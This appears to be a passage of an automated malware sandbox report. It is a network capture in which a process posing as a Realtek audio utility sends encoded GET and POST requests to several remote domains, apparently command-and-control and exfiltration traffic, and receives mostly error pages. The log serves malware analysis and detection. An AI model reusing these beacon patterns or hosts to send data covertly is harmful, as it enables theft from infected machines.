                                                                            Data Ascii: gVVW1UjMjbPdxjKpmfnybfJdldS8csZHSfh7vr5p0Lt97ifzHL9jxezh5aPpYv/mg9wWJY+9UtQ6+hsuHvdO/ClJVVnAI9beDb9q6Mvze6iacXYekLStQZRylpiSg3FZfTgJbTqu76bd3jCiS4tiU3Ir/gl1UwDBxJinfOTkzClOrvZPAUfoibF7o6eMvlcRmPVZFEhKQCukTZjpacA7szafHMcpw15g6bTUdf3dj1ABnlheyxP


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            36192.168.11.2049785208.91.197.39807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:57:14.628333092 CET483OUTGET /hxi5/?2O=/xN+QifpSgLb8oJax+YyM6tUBGB4yp//ixYmgFld7FWiq7hEgfqLv69cCSKy7O4D9GLUZYEuvgkAAG4+HQzEHPV07OBsdCtve3vh4iUoSVc6KmBMx1Jirj8=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.jcsa.info
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:57:16.592514992 CET626INHTTP/1.0 500 Internal Server Error
                                                                            Date: Tue, 03 Dec 2024 17:57:14 GMT
                                                                            Server: Apache
                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                            Content-Length: 0
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=UTF-8


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            37192.168.11.204978643.205.198.29807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:57:22.215358019 CET773OUTPOST /j8pv/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.1secondlending.one
                                                                            Origin: http://www.1secondlending.one
                                                                            Referer: http://www.1secondlending.one/j8pv/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 45 4b 47 44 2b 46 4e 56 6b 2b 47 4f 4f 52 33 54 75 71 4b 32 67 39 58 30 37 6d 46 50 44 44 71 64 6b 57 31 64 50 6d 38 4c 75 36 36 2f 43 74 37 43 6c 54 35 2b 31 6b 6a 30 72 77 4e 68 50 52 63 2b 51 47 47 4c 36 32 57 50 44 52 62 43 4a 57 48 4d 70 4a 45 7a 31 41 70 2f 59 74 4d 43 52 59 4a 62 4f 51 7a 6f 66 66 57 61 37 78 30 57 42 31 71 45 6c 32 68 6d 55 66 4d 77 50 57 47 2b 33 79 66 39 32 2b 72 47 61 53 70 46 4a 66 35 71 44 71 70 4a 7a 50 50 4b 7a 38 62 6f 4b 51 51 33 77 38 66 66 74 2b 4b 55 34 66 64 38 52 30 5a 70 57 78 7a 59 52 36 61 37 59 75 6e 48 4a 6c 49 51 7a 31 54 45 39 77 3d 3d
                                                                            Data Ascii: 2O=EKGD+FNVk+GOOR3TuqK2g9X07mFPDDqdkW1dPm8Lu66/Ct7ClT5+1kj0rwNhPRc+QGGL62WPDRbCJWHMpJEz1Ap/YtMCRYJbOQzoffWa7x0WB1qEl2hmUfMwPWG+3yf92+rGaSpFJf5qDqpJzPPKz8boKQQ3w8fft+KU4fd8R0ZpWxzYR6a7YunHJlIQz1TE9w==
                                                                            Dec 3, 2024 18:57:22.567423105 CET691INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 17:57:22 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 548
                                                                            Connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            38192.168.11.204978743.205.198.29807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:57:25.097084045 CET793OUTPOST /j8pv/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.1secondlending.one
                                                                            Origin: http://www.1secondlending.one
                                                                            Referer: http://www.1secondlending.one/j8pv/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 45 4b 47 44 2b 46 4e 56 6b 2b 47 4f 4d 78 48 54 6f 4e 57 32 6f 39 58 7a 2b 6d 46 50 59 7a 72 57 6b 57 35 64 50 69 73 62 76 49 65 2f 43 4a 33 43 6b 53 35 2b 35 45 6a 30 67 51 4e 6b 4c 52 63 31 51 48 37 2b 36 7a 57 50 44 52 2f 43 4a 55 66 4d 70 65 51 77 31 51 70 78 51 4e 4d 45 66 34 4a 62 4f 51 7a 6f 66 66 44 39 37 78 73 57 43 46 61 45 6d 55 4a 6c 58 66 4d 2f 4f 57 47 2b 6d 43 66 35 32 2b 71 72 61 51 64 72 4a 64 42 71 44 6f 78 4a 30 65 50 4a 36 38 61 6a 4f 51 52 70 33 2f 4f 7a 72 4e 65 6c 7a 75 67 6e 57 58 59 53 54 6e 2b 43 4d 49 75 66 62 39 37 31 4e 56 78 34 78 33 53 66 67 36 35 4b 46 58 54 73 38 78 71 77 5a 65 63 6c 57 32 30 54 36 34 45 3d
                                                                            Data Ascii: 2O=EKGD+FNVk+GOMxHToNW2o9Xz+mFPYzrWkW5dPisbvIe/CJ3CkS5+5Ej0gQNkLRc1QH7+6zWPDR/CJUfMpeQw1QpxQNMEf4JbOQzoffD97xsWCFaEmUJlXfM/OWG+mCf52+qraQdrJdBqDoxJ0ePJ68ajOQRp3/OzrNelzugnWXYSTn+CMIufb971NVx4x3Sfg65KFXTs8xqwZeclW20T64E=
                                                                            Dec 3, 2024 18:57:25.456001043 CET691INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 17:57:25 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 548
                                                                            Connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            39192.168.11.204978843.205.198.29807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:57:27.980456114 CET2578OUTPOST /j8pv/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.1secondlending.one
                                                                            Origin: http://www.1secondlending.one
                                                                            Referer: http://www.1secondlending.one/j8pv/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 45 4b 47 44 2b 46 4e 56 6b 2b 47 4f 4d 78 48 54 6f 4e 57 32 6f 39 58 7a 2b 6d 46 50 59 7a 72 57 6b 57 35 64 50 69 73 62 76 49 57 2f 43 36 2f 43 6c 78 52 2b 34 45 6a 30 74 77 4e 6c 4c 52 63 53 51 47 54 36 36 7a 53 35 44 54 58 43 49 33 58 4d 38 62 73 77 6d 77 70 78 50 39 4d 46 52 59 4a 53 4f 55 66 30 66 66 54 39 37 78 73 57 43 48 43 45 77 32 68 6c 52 66 4d 77 50 57 47 49 33 79 66 56 32 2b 54 65 61 51 5a 56 4a 4d 68 71 43 49 68 4a 79 73 6e 4a 78 38 61 68 4a 51 52 68 33 2f 43 73 72 4e 53 44 7a 74 39 41 57 55 34 53 52 7a 79 42 5a 37 43 49 50 73 4c 58 51 48 6c 39 6d 6c 47 76 72 49 34 33 56 6b 6e 46 37 6c 32 2f 47 38 51 4e 47 46 64 56 73 63 78 6a 2b 67 65 42 45 38 30 47 6d 37 41 72 51 42 31 59 69 6e 2f 2b 75 33 36 35 78 52 52 76 2f 2f 56 35 2f 75 4c 36 67 63 45 75 31 78 44 49 4e 36 7a 51 46 45 66 67 42 4a 7a 50 78 4f 65 69 38 58 75 6c 78 31 41 44 48 4c 34 4a 72 6d 6d 66 66 76 51 37 6d 69 38 50 77 46 67 62 4a 69 64 75 79 6c 30 66 2f 75 6e 53 75 4c 42 63 33 65 59 4c 30 46 78 76 35 47 59 37 6f 64 38 [TRUNCATED]
                                                                            Data Ascii: 2O=EKGD+FNVk+GOMxHToNW2o9Xz+mFPYzrWkW5dPisbvIW/C6/ClxR+4Ej0twNlLRcSQGT66zS5DTXCI3XM8bswmwpxP9MFRYJSOUf0ffT97xsWCHCEw2hlRfMwPWGI3yfV2+TeaQZVJMhqCIhJysnJx8ahJQRh3/CsrNSDzt9AWU4SRzyBZ7CIPsLXQHl9mlGvrI43VknF7l2/G8QNGFdVscxj+geBE80Gm7ArQB1Yin/+u365xRRv//V5/uL6gcEu1xDIN6zQFEfgBJzPxOei8Xulx1ADHL4JrmmffvQ7mi8PwFgbJiduyl0f/unSuLBc3eYL0Fxv5GY7od8DbzMzXBRG1Ojc8dDlJpSEAMA1ifwhXADOyeNkhenUtmqM5cv0Rfs0y9GxLej1fIFjXHZf/eVAa1yqLNjftqNaRwRoGZNSZfLvLbqS7TB5vG9NOlhFepra4VLR6nzq8pbOC4EDNMcALXUces1RaUTFuTojQJF9i/Lc7zrJTcUYExgm5XwbbV8tXc3iXb9nBLkDzI8JIFh7R7die3OXNZcncimPy6jN02kv034WArteu2zqOkfnXeT1ShHvFzitsyapANsNqyGFnC2kPdLgHXR54HOIms+kQv8aDGuXW/C70wRNNgW60ekG0EvxZr0qdnc25ReQ5vKTxjRHeXRzSj25D4XEUJwzvW6p4c7FjsOnT0RQ/d4+BotfXcB2XdcRrMUPN8EIb3CgxmYSq47sVsmD1rga12Wvd2j3M35kspvfWJtf28FDUffPhqzNXRGVHyeUMMXi7vGQCisnJIyH4n3TIvWwjMxQfM19EQRVmbzwaK/+U8/Na3/7PSclD1bEUT/zAlRvdhAH95cWm6ODwEox/b/oCOC5Jd2NXh/1bYkqrMQ5zOEJh9w7YuIAm/hP5BuZ9syYOY3818REH1N9P+MEBAi01UQmX8zq3sGE2nUe96iV750aYuYE672S9eyjE6PaUrd3W6iaPqgrj1veISYaR8ISHWd7ms6nO [TRUNCATED]
                                                                            Dec 3, 2024 18:57:27.980535030 CET5364OUTData Raw: 34 51 34 4c 6e 68 4f 6b 64 34 69 54 4a 54 37 57 68 56 44 65 42 6e 2f 35 6a 38 44 6a 76 67 38 59 48 71 31 72 45 39 2b 46 6a 69 6f 45 75 58 67 33 6b 66 45 6f 62 2f 71 70 54 6b 35 66 2b 42 57 34 31 79 66 7a 65 45 34 5a 73 72 4b 7a 6b 76 47 57 57 6f
                                                                            Data Ascii: 4Q4LnhOkd4iTJT7WhVDeBn/5j8Djvg8YHq1rE9+FjioEuXg3kfEob/qpTk5f+BW41yfzeE4ZsrKzkvGWWo+EUtC8oDIjp8vgvGgxmHmVQThB5NgFNtrFv06567VGJhDUGOJhYCuWVBX3NefWFqSayVZwvtGBIEC3wExk3s95GIbQ4Z38GDJULwtKtRh11M4LCqu1R90uNTLMnDaSOU6ZkfC/XJZvY9SmMYjjbODJjEB2cbWJW/s
                                                                            Dec 3, 2024 18:57:28.329864979 CET691INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 17:57:28 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 548
                                                                            Connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            40192.168.11.204978943.205.198.29807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:57:30.858681917 CET492OUTGET /j8pv/?ChhG6=J-xs&2O=JIuj9wxSnK6mEyWE+aiov6ee/jFUGAOavn5HAjA8ht24L6v+vQ9uqWj6ig59Dwg+VmGSo2u3Iy71OFL1070b+iEHSPgDI61AbnX1cIuegQgrBk3SzXJVVb4= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.1secondlending.one
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:57:31.221328020 CET691INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 17:57:31 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 548
                                                                            Connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            41192.168.11.2049790172.67.187.114807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:57:36.497899055 CET758OUTPOST /swhs/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.zkdamdjj.shop
                                                                            Origin: http://www.zkdamdjj.shop
                                                                            Referer: http://www.zkdamdjj.shop/swhs/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 78 7a 33 56 47 6e 4e 36 59 4a 49 2b 37 78 49 2b 45 65 4b 55 64 49 43 74 4e 67 31 32 6d 61 62 6e 6a 41 66 6d 32 2f 75 75 2f 56 77 59 6b 43 44 53 70 68 37 52 2b 74 4a 51 48 36 72 6d 7a 49 6a 51 78 52 47 67 4b 6c 34 37 42 63 4c 4d 68 6e 55 4b 44 57 66 62 51 56 6f 6a 52 67 44 7a 59 50 6d 4c 62 30 6c 54 63 50 69 41 65 31 37 75 6d 59 6d 52 62 67 4f 6a 69 61 70 35 77 61 4c 4b 72 35 6b 50 68 4d 4d 35 70 69 39 7a 67 36 6c 6c 5a 34 77 36 67 34 44 2b 4e 55 56 70 77 68 67 50 49 53 59 35 39 64 61 55 74 64 64 4b 75 59 49 59 63 31 55 45 78 63 68 71 72 75 72 6f 36 74 68 41 69 48 50 6d 39 77 3d 3d
                                                                            Data Ascii: 2O=xz3VGnN6YJI+7xI+EeKUdICtNg12mabnjAfm2/uu/VwYkCDSph7R+tJQH6rmzIjQxRGgKl47BcLMhnUKDWfbQVojRgDzYPmLb0lTcPiAe17umYmRbgOjiap5waLKr5kPhMM5pi9zg6llZ4w6g4D+NUVpwhgPISY59daUtddKuYIYc1UExchqruro6thAiHPm9w==
                                                                            Dec 3, 2024 18:57:37.499919891 CET1289INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:57:37 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            x-litespeed-tag: 02a_HTTP.404
                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                                            link: <https://zkdamdjj.shop/wp-json/>; rel="https://api.w.org/"
                                                                            x-litespeed-cache-control: no-cache
                                                                            vary: Accept-Encoding
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hw03VwLkAd0RF9MMaI8aynrzA5hNm0aQ%2FhhkhwME3YrGP3PQe88G8pDO%2BY9KZCbVblLTD%2B5GPRxTzjD8uvDJzeO97SgiBNrr9pCvhqCqMVDlfWXOewIIw%2F3dGeEnMtlxFSnh3g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8ec570a779243361-MIA
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=126366&min_rtt=126366&rtt_var=63183&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=758&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 64 65 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 1a 69 73 9c 38 f6 f3 f8 57 60 5c d3 86 09 d0 d0 87 db a6 43 26 3b 89 b3 47 65 c6 a9 38 a9 ad 2d db 95 12 e8 41 cb 06 89 95 44 1f e9 e1 bf 6f 09 e8 6e fa 70 e2 f1 ce ae 53 49 e0 e9 dd 7a 97 84 5f 1e bf bd 7a f3 e9 5f 1f 2e b5 89 cc d2 57 47 2f d5 7f 5a 8a 68 12 e8 40 ed cf d7 ba 96 73 88 c9 3c d0 59 e2 6b 13 29 73 e1 77 bb 2c c9 9d 0c ba 54 9c e8 5a 94 22 21 02 3d 65 08 13 9a d8 82 48 d0 28 b3 ef 85 ae d8 01 c2 af 8e 7e 78 99 81 44 5a 34 41 5c 80 0c f4 cf 9f de d9 e7 ba d6 55 2b 29 a1 0f 1a 87 34 d0 73 ce 62 92 82 ae 4d 38 c4 81 ae 64 f9 dd 6e 92 e5 89 c3 78 d2 9d c7 b4 eb 79 fb 54 84 26 21 8a 1e da
                                                                            Data Ascii: de0is8W`\C&;Ge8-ADonpSIz_z_.WG/Zh@s<Yk)sw,TZ"!=eH(~xDZ4A\U+)4sbM8dnxyT&!
                                                                            Dec 3, 2024 18:57:37.499948025 CET1289INData Raw: 64 4a c5 af 0f 18 65 f8 fe de 11 13 96 77 e7 59 ca f3 c8 c9 27 79 c5 e0 e8 07 f5 f3 52 44 9c e4 f2 15 66 51 91 01 95 ce ea e1 32 85 ea bd 32 ed 37 94 81 16 68 4f 40 7a a1 9d 6a 0b 10 f6 bd d0 ee c5 17 14 49 32 05 ed 5e 9c be ec 36 82 8e da 52 8d
                                                                            Data Ascii: dJewY'yRDfQ227hO@zjI2^6R$R%qpS+]^i<9}J`3.u-bT>#XNS]XD"B)_vG&vKH#HN4{1^}@h1cBr$$_
                                                                            Dec 3, 2024 18:57:37.500071049 CET1289INData Raw: d9 e9 1c ef 6a 36 b8 2d 70 38 70 6f 0b 1c 9d 8d 5a cf bd d6 f3 b0 f5 0c 87 f1 47 3b 96 0c d6 e2 5b c8 3b 90 de 1e 64 b8 07 81 ef f3 19 c5 ba 39 ae b6 a0 a9 0b f5 1e b4 2c 55 3a 43 ec b5 d4 0b 57 3b b1 5e ed b5 56 d7 b6 3c 46 18 3e 4a 68 96 8d 74
                                                                            Data Ascii: j6-p8poZG;[;d9,U:CW;^V<F>Jhto1*bTB@/(Pq6)Qz:i*$AU.\8}Sw]O^gnZ(*iCaZH~qwT-Mr/H@J.jENIu~/k,N%&2
                                                                            Dec 3, 2024 18:57:37.500087023 CET763INData Raw: ac 13 f7 ec a2 0f 7d b3 2d 35 2f 78 9e 82 1d f1 42 4c 9e cb be 3f 80 1e 0c ac 93 c1 a8 e7 c5 a1 36 74 7f b4 4e 50 e8 e1 18 b6 44 4d d0 57 e5 8e 19 7d ae 9c 18 a1 08 9d 5b 27 18 61 17 a2 2d de a2 08 71 01 d8 66 29 99 c2 f3 f9 c7 08 3c eb e4 6c 84
                                                                            Data Ascii: }-5/xBL?6tNPDMW}['a-qf)<lF$YF"[MAc<@j7hxRu"[3*`==Y' b!)R7Y\?d5RU0N9WxuQ87EN1i4REPT&iGjrkbl=$P1lD2
